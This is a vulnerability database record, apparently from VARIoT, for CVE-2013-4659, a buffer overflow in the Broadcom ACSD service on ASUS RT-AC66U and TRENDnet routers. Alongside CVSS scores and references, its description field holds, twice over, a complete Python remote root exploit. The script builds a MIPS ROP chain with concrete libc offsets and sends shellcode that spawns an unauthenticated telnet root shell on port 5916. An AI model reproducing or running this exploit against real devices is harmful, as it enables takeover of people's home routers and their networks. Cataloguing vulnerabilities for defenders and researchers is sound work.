VAR-201703-0032
Vulnerability from variot - Updated: 2023-12-18 13:44Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python
import signal, struct from time import sleep from socket import * from sys import exit, exc_info
Title***ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
Discovered and Reported*June 2013
Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson
*Security Analsyts @ Independent Security Evaluators
Software Vendor***http://asus.com
Exploit/Advisory**http://securityevaluators.com, http://infosec42.blogspot.com/
Software****acsd wireless service (Listens on TCP/5916)
Firmware Version**3.0.0.4.266 (Other versions were not tested and may be vulnerable)
CVE***ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659
Overview:
The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple
Buffer Overflow attacks.
Multiple overflows exist in the following software:
- Broadcom acsd - Wireless Channel Service (autochannel¶m, autochannel&data, csscan&ifname commands)
def sigHandle(signum, frm): # Signal handler
print "\n[!!!] Cleaning up the exploit... [!!!]\n"
sleep(1)
exit(0)
def targServer():
while True:
try:
server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>"))
server = inet_ntoa(server)
break
except:
print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n"
sleep(1)
continue
return server
def main():
print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command
[] Discovered and Reported: June 2013 [] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [] Software Vendor: http://asus.com [] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [] Software: acsd wireless service (Listens on TCP/5916) [] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel¶m=" #Vulnerable command - JH
# base address of .text section of libc.so.0 in acsd's address space
libc_base = 0x2ab25000
# ROP gadget #1
# lui s0,0x2
# li a0,1
# move t9,s1
# jalr t9
# ori a1,s0,0x2
ra1 = struct.pack("<L", libc_base + 0x2d39c)
# ROP gadget #2
# move t9,s3
# lw ra,44(sp)
# lw s4,40(sp)
# lw s3,36(sp)
# lw s2,32(sp)
# lw s1,28(sp)
# lw s0,24(sp)
# jr t9
s1 = struct.pack("<L", libc_base + 0x34358)
# sleep() - used to force program context switch (cache flush)
s3 = struct.pack("<L", libc_base + 0x2cb90)
# ROP gadget #3
# addiu a1,sp,24
# lw gp,16(sp)
# lw ra,32(sp)
# jr ra
# addiu sp,sp,40
ra2 = struct.pack("<L", libc_base + 0xa1b0)
# ROP gadget #4
# move t9,a1
# addiu a0,a0,56
# jr t9
# move a1,a2
ra3 = struct.pack("<L", libc_base + 0x3167c)
# jalr sp
jalr_sp = "\x09\xf8\xa0\x03"
JuNk = "\x42" * 510
safeNop = "2Aa3"
#80 Bytes system() Shellcode by Jacob Holcomb of ISE
#Calling system() and executing telnetd -l /bin/sh
shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8"
shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff"
shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4"
shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35"
shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac"
shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a"
shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32"
shellcode += "\x41\x61\x33"
sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]
sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]
sploit += safeNop + shellcode
try:
print "\n [*] Creating network socket."
net_sock = socket(AF_INET, SOCK_STREAM)
except:
print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info()
sleep(1)
exit(0)
try:
print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port)
net_sock.connect((victim, port))
except:
print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info())
sleep(1)
exit(0)
try:
print """ [*] Attempting to exploit the acsd param command.
[] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0)
try:
print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!
[*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0)
if name == "main": main()
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201703-0032",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 1.6,
"vendor": "asus",
"version": null
},
{
"model": "tew-812dru",
"scope": "eq",
"trust": 1.0,
"vendor": "trendnet",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "tew-812dru",
"scope": null,
"trust": 0.8,
"vendor": "trendnet",
"version": null
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.266"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:asus:rt-ac66u_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:asus:rt-ac66u:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:trendnet:tew-812dru_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:trendnet:tew-812dru:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4659"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Holcomb/Gimppy and Jacob Thompson",
"sources": [
{
"db": "BID",
"id": "61499"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
],
"trust": 0.9
},
"cve": "CVE-2013-4659",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": true,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2013-4659",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-11043",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-64661",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2013-4659",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-4659",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2013-11043",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201307-627",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-64661",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2013-4659",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in Broadcom ACSD allows remote attackers to execute arbitrary code via a long string to TCP port 5916. This component is used on routers of multiple vendors including ASUS RT-AC66U and TRENDnet TEW-812DRU. The ASUS RT-AC66U is a dual-band wireless router. ASUS RT-AC66U Broadcom acsd Wireless Channel Service (Wireless Channel Servic) has multiple buffer overflow vulnerabilities that allow remote attackers to exploit a vulnerability to submit a malicious request to stop the device from responding or possibly execute arbitrary code. ASUS RT-AC66U is prone to multiple buffer-overflow vulnerabilities. Failed exploit attempts will likely result in denial-of-service conditions. The former is produced by ASUS, and the latter is produced by TRENDnet in the United States. Broadcom ACSD is one of the wireless channel service components. A buffer overflow vulnerability exists in the Broadcom ACSD component used in the ASUS RT-AC66U and TRENDnet TEW-812DRU. #!/usr/bin/env python\n\nimport signal, struct\nfrom time import sleep\nfrom socket import *\nfrom sys import exit, exc_info\n\n#\n# Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n# Discovered and Reported*June 2013 \n# Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson\n# *Security Analsyts @ Independent Security Evaluators\n# Software Vendor*********http://asus.com\n# Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/\n# Software****************acsd wireless service (Listens on TCP/5916)\n# Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) \n# CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659\n#\n# Overview:\n#\tThe ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple \n# Buffer Overflow attacks. \n#\n# Multiple overflows exist in the following software:\n#\n#\t- Broadcom acsd - Wireless Channel Service (autochannel\u0026param, autochannel\u0026data, csscan\u0026ifname commands)\n#\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\n\ndef sigHandle(signum, frm): # Signal handler\n \n print \"\\n[!!!] Cleaning up the exploit... [!!!]\\n\"\n sleep(1)\n exit(0)\n\n\ndef targServer():\n \n while True: \n try:\n server = inet_aton(raw_input(\"\\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\\n\\n\u003e\"))\n server = inet_ntoa(server)\n break\n except:\n print \"\\n\\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\\n\\n\"\n sleep(1)\n continue\n \n return server \n\n\ndef main():\n \n print (\"\"\"\\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command\n [*] Discovered and Reported: June 2013\n [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE\n [*] Software Vendor: http://asus.com\n [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/\n [*] Software: acsd wireless service (Listens on TCP/5916)\n [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable)\n [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\\n\"\"\")\n signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c\n victim = targServer()\n port = int(5916)\n acsdCmd = \"autochannel\u0026param=\" #Vulnerable command - JH\n \n # base address of .text section of libc.so.0 in acsd\u0027s address space\n libc_base = 0x2ab25000\n\n # ROP gadget #1\n # lui s0,0x2\n # li a0,1\n # move t9,s1\n # jalr t9\n # ori a1,s0,0x2\n ra1 = struct.pack(\"\u003cL\", libc_base + 0x2d39c)\n\n # ROP gadget #2\n # move t9,s3\n # lw ra,44(sp)\n # lw s4,40(sp)\n # lw s3,36(sp)\n # lw s2,32(sp)\n # lw s1,28(sp)\n # lw s0,24(sp)\n # jr t9\n s1 = struct.pack(\"\u003cL\", libc_base + 0x34358)\n\n # sleep() - used to force program context switch (cache flush)\n s3 = struct.pack(\"\u003cL\", libc_base + 0x2cb90)\n\n # ROP gadget #3\n # addiu a1,sp,24\n # lw gp,16(sp)\n # lw ra,32(sp)\n # jr ra\n # addiu sp,sp,40\n ra2 = struct.pack(\"\u003cL\", libc_base + 0xa1b0)\n\n # ROP gadget #4\n # move t9,a1\n # addiu a0,a0,56\n # jr t9\n # move a1,a2\n ra3 = struct.pack(\"\u003cL\", libc_base + 0x3167c)\n\n # jalr sp\n jalr_sp = \"\\x09\\xf8\\xa0\\x03\"\n \n JuNk = \"\\x42\" * 510\n safeNop = \"2Aa3\"\n\n #80 Bytes system() Shellcode by Jacob Holcomb of ISE\n #Calling system() and executing telnetd -l /bin/sh\n shellcode = \"\\x6c\\x6e\\x08\\x3c\\x74\\x65\\x08\\x35\\xec\\xff\\xa8\"\n shellcode += \"\\xaf\\x64\\x20\\x09\\x3c\\x65\\x74\\x29\\x35\\xf0\\xff\"\n shellcode += \"\\xa9\\xaf\\x20\\x2f\\x0a\\x3c\\x2d\\x6c\\x4a\\x35\\xf4\"\n shellcode += \"\\xff\\xaa\\xaf\\x6e\\x2f\\x0b\\x3c\\x62\\x69\\x6b\\x35\"\n shellcode += \"\\xf8\\xff\\xab\\xaf\\x73\\x68\\x0c\\x24\\xfc\\xff\\xac\"\n shellcode += \"\\xaf\\xec\\xff\\xa4\\x23\\xec\\xff\\xbd\\x23\\xb4\\x2a\"\n shellcode += \"\\x19\\x3c\\x50\\xf0\\x39\\x37\\x09\\xf8\\x20\\x03\\x32\"\n shellcode += \"\\x41\\x61\\x33\"\n\n sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48]\n sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4]\n sploit += safeNop + shellcode\n\n try:\n print \"\\n [*] Creating network socket.\"\n net_sock = socket(AF_INET, SOCK_STREAM)\n except:\n print \"\\n [!!!] There was an error creating the network socket. [!!!]\\n\\n%s\\n\" % exc_info() \n sleep(1)\n exit(0) \n\n try:\n print \" [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d.\" % (victim, port)\n net_sock.connect((victim, port))\n except:\n print \"\\n [!!!] There was an error connecting to %s. [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n sleep(1)\n exit(0)\n \n try:\n print \"\"\" [*] Attempting to exploit the acsd param command. \n [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. \n [*] Payload Length: %d bytes.\"\"\" % (victim, port, len(sploit))\n net_sock.send(sploit)\n sleep(1)\n except:\n print \"\\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\\n\\n%s\\n\" % (victim, exc_info())\n sleep(1)\n exit(0)\n\n try:\n print \"\"\" [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution!\n [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\\n\"\"\"\n net_sock.close()\n except:\n print \"\\n [!!!] There was an error closing the network socket. [!!!]\\n\\n%s\\n\" % exc_info()\n sleep(1)\n exit(0)\n\n\nif __name__ == \"__main__\":\n main()\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "BID",
"id": "61499"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "PACKETSTORM",
"id": "122562"
}
],
"trust": 2.7
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=27133",
"trust": 0.2,
"type": "exploit"
},
{
"reference": "https://www.scap.org.cn/vuln/vhn-64661",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-4659",
"trust": 3.6
},
{
"db": "PACKETSTORM",
"id": "122562",
"trust": 2.7
},
{
"db": "BID",
"id": "61499",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2013-11043",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "24219",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "27133",
"trust": 0.2
},
{
"db": "SEEBUG",
"id": "SSVID-80751",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-80752",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-64661",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2013-4659",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "BID",
"id": "61499"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "PACKETSTORM",
"id": "122562"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
]
},
"id": "VAR-201703-0032",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
}
],
"trust": 1.1829994849999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
}
]
},
"last_update_date": "2023-12-18T13:44:09.759000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.asus.com/jp/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.trendnet.com/home"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "http://www.linux-magazine.com/issues/2014/161/security-and-soho-routers"
},
{
"trust": 2.6,
"url": "https://packetstormsecurity.com/files/122562/asus-rt-ac66u-acsd-remote-root-buffer-overflow.html"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-4659"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4659"
},
{
"trust": 0.6,
"url": "http://1337day.com/exploit/21033"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/61499"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/24219"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=33445"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/27133/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://asus.com"
},
{
"trust": 0.1,
"url": "http://securityevaluators.com,"
},
{
"trust": 0.1,
"url": "http://infosec42.blogspot.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "PACKETSTORM",
"id": "122562"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"db": "VULHUB",
"id": "VHN-64661"
},
{
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"db": "BID",
"id": "61499"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"db": "PACKETSTORM",
"id": "122562"
},
{
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-08-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"date": "2017-03-14T00:00:00",
"db": "VULHUB",
"id": "VHN-64661"
},
{
"date": "2017-03-14T00:00:00",
"db": "VULMON",
"id": "CVE-2013-4659"
},
{
"date": "2013-07-29T00:00:00",
"db": "BID",
"id": "61499"
},
{
"date": "2017-04-05T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-006764"
},
{
"date": "2013-07-26T20:22:22",
"db": "PACKETSTORM",
"id": "122562"
},
{
"date": "2017-03-14T09:59:00.160000",
"db": "NVD",
"id": "CVE-2013-4659"
},
{
"date": "2013-07-29T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-627"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-08-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-11043"
},
{
"date": "2017-03-15T00:00:00",
